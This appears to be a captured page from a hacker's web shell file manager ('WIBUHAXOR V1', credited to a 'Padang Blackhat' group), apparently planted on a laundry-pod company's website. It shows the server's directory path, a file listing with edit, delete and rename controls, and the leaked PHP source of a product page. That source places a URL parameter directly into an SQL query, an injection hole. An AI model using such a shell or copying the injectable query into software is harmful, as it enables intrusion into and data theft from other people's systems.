-
WIBUHAX0R1337
-
/
home
/
zqegovsj
/
www
/
us3web.haibo.com.cn
/
laundrypodsac
/
es
/
[ Home ]
Create Folder
Create File
Nama File / Folder
Size
Action
.well-known
--
NONE
a1creathtml
--
NONE
cgi-bin
--
NONE
css
--
NONE
fonts
--
NONE
js
--
NONE
pic
--
NONE
right-images
--
NONE
webfonts
--
NONE
.htaccess
2.496KB
Edit File
Delete File
Rename
404.php
0.39KB
Edit File
Delete File
Rename
becomeouragent.php
11.864KB
Edit File
Delete File
Rename
closelabel.gif
0.956KB
Edit File
Delete File
Rename
customization.php
20.655KB
Edit File
Delete File
Rename
foot.php
7.361KB
Edit File
Delete File
Rename
freesample.php
7.304KB
Edit File
Delete File
Rename
google7d87d3f79a513cd9.html
0.052KB
Edit File
Delete File
Rename
head.php
8.04KB
Edit File
Delete File
Rename
lang.php
7.864KB
Edit File
Delete File
Rename
lang_about.php
3.543KB
Edit File
Delete File
Rename
lang_aboutmrloong.php
1.663KB
Edit File
Delete File
Rename
lang_index.php
2.185KB
Edit File
Delete File
Rename
lang_prodindex.php
6.348KB
Edit File
Delete File
Rename
lang_whychooseus.php
0.824KB
Edit File
Delete File
Rename
message.php
3.459KB
Edit File
Delete File
Rename
news.php
3.354KB
Edit File
Delete File
Rename
news2.php
3.51KB
Edit File
Delete File
Rename
page-index.php
31.592KB
Edit File
Delete File
Rename
page_navigation.php
0.986KB
Edit File
Delete File
Rename
prodtype.php
4.223KB
Edit File
Delete File
Rename
product.php
4.169KB
Edit File
Delete File
Rename
product2.php
6.238KB
Edit File
Delete File
Rename
robots.txt
1.105KB
Edit File
Delete File
Rename
sectioncontent.php
1.918KB
Edit File
Delete File
Rename
session.php
0.15KB
Edit File
Delete File
Rename
sitemap.xml
39.391KB
Edit File
Delete File
Rename
tag.php
1.817KB
Edit File
Delete File
Rename
webexc.html
0.136KB
Edit File
Delete File
Rename
webexc.php
0.427KB
Edit File
Delete File
Rename
<?php include("function.php"); $tit=$db->selectone("select id,name from en_sizes where id='".$_GET['sort_id']."'"); $products=$db->selectarray("select id,name,sn,picture,name2,more,sizes from ".$noe_version."_products where member_id=".$id." and sizes=".$tit[0]." order by ep_range desc"); $aa='product.html'; $aaa=$lang['words'][72]; $bb=$db->turn_name($tit[1]).'_prodtype'.$tit[0].'.html'; $bbb=$tit[1]; $purl=$bb; $pageh1=$aaa; $feedbacktit='Online inquire from website'; $pagekeyword=$bbb.', '.$lang['words'][232].', '.$aaa.', '.$company['1']; $pagekeyword2=$pagekeyword; $pagekeyword3=$bbb.', '.$lang['words'][232].' '.$lang['words'][159].', '.$lang['words'][194].', '.$lang['words'][193].', '.$lang['words'][191].' '.$bbb.', '.$lang['words'][232].' '.$lang['words'][155].', '.$lang['words'][156].', '.$lang['words'][157]; include("head.php"); ?> <section id="page-title" class="parallax page-title-center center" style="background-image: url('https://<?=$imgweb?>/pic/top-bg.jpg'); background-size: cover; padding: 100px 0;" data-100-bottom-top="background-position:0px 200px;" data-top-bottom="background-position:0px -200px;"> <div class="container clearfix" style="z-index: 2"> <h1><?=$pageh1?></h1> <span><?=$lang['words'][231]?></span> <ol class="breadcrumb"> <li class="breadcrumb-item"><a href="https://<?=$company2[13]?>/"><i class="icon-home"></i> <?=$lang['words'][70]?></a> </li> <? if($aaa!=''){?> <li class="breadcrumb-item"><a href="https://<?=$company2[13]?>/<?=$aa?>"><?=ucfirst(strtolower($aaa))?></a></li> <? if($bbb!=''){?><li class="breadcrumb-item"><a href="https://<?=$company2[13]?>/<?=$bb?>"><?=$bbb?></a></li><? if($ccc!=''){?><li class="breadcrumb-item"><a href="https://<?=$company2[13]?>/<?=$cc?>"><?=$ccc?></a></li><? if($ddd!=''){?><li class="breadcrumb-item"><a href="https://<?=$company2[13]?>/<?=$dd?>"><?=$ddd?></a></li><? } } } }?> </ol> </div> </section> <section id="content"> <div class="content-wrap"> <div class="container"> <ul class="nav nav-sm grid-filter style-2 mx-auto" role="tablist"> <? $ptype2sql=$db->selectarray("select id,name from en_sizes where member_id=".$id." order by id ASC"); while(@$ptype2=mysqli_fetch_row($ptype2sql)){?> <li><a href="/<?=$db->turn_name($ptype2[1])?>_prodtype<?=$ptype2[0]?>.html" aria-selected="<? if ($ptype2[0]==$tit[0]) {?>true<? } else {?>false<? }?>" role="tab" class="sizes-color <? if ($ptype2[0]==$tit[0]) {?>active<? }?>"><img src="https://<?=$imgweb?>/pic/sizes-<?=($ptype2[0])?>.png" alt="<?=($ptype2[1])?>" style="max-height:38px; width:auto;"></a></li> <? }?> </ul> <div id="shop" class="shop row gutter-30"> <? $i=1; while(@$a=mysqli_fetch_row($products)){ ?><div class="product col-lg-3 col-md-4 col-sm-6 col-6"> <div class="charity-card h-shadow shadow-ts card rounded-5"> <div class="product p-3"> <div class="product-image"> <a href="/<?=$db->turn_name($a[4])?>_product<?=$a[0]?>.html" title="<?=$a[1]?>"><img src="https://<?=$imgprod?>/upload/middle/<?=$a[3]?>" alt="<?=$a[1]?>"></a> </div> <div class="product-desc"> <div class="product-title mb-0"> <p class="fw-semibold mb-2 mt-2"><?=$a[2]?></p> <h4 class="mb-0" style="min-height:135px;"><a class="fw-medium" href="/<?=$db->turn_name($a[4])?>_product<?=$a[0]?>.html" title="<?=$a[1]?>"><?=$a[1]?></a></h4></div> </div> <div class="row justify-content-between align-items-center pb-0 mb-0 pt-3"> <div class="col-md-6 col-4 col-sm-6"> <? if ($a[6]!=="") {?> <img src="https://<?=$imgweb?>/pic/sizes-<?=($a[6])?>.png" style="max-height:50px; width:auto;"> <? }?> </div> <div class="col-md-6 col-8 col-sm-6 text-right"> <a href="/<?=$db->turn_name($a[4])?>_product<?=$a[0]?>.html#Feedback" class="button button-small button-rounded button-border button-teal"><?=$lang['words'][316]?></a> </div> </div> </div> </div></div> <? $i++;?> <? }?> </div> <? if($pagecount>12){?> <div class="page_num clearfix"> <? include("page_navigation.php");?> </div> <? }?> </div> </div> </section> <? include("foot.php");?>
© 2022 - 2023 WIBUHAXOR V1 By Lutfifakee || Padang Blackhat